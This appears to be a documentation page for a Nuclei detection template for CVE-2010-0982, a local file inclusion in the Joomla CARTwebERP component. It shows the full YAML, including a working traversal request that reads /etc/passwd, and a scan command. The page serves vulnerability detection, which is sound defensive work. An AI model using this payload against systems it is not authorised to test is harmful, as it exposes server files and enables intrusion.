Joomla! Component com_cartweberp - Local File Inclusion
ID: CVE-2010-0982
Severity: medium
Author: daffainfo
Tags: cve2010,cve,joomla,lfi,edb,joomlamo
Description
Section titled “Description”A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2010-0982
info: name: Joomla! Component com_cartweberp - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. impact: | Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/10942 - https://nvd.nist.gov/vuln/detail/CVE-2010-0982 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 epss-percentile: 0.80553 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo product: com_cartweberp tags: cve2010,cve,joomla,lfi,edb,joomlamo
http: - method: GET path: - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a0047304502200dd9a277489da3e123ae3d0e850e377baaa0a4f1001e86ac50fa7d0a87ea12d5022100d2377f52429ed982c57d79ecd5704617a44ceed0e566b8379614549618593e37:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-0982.yaml"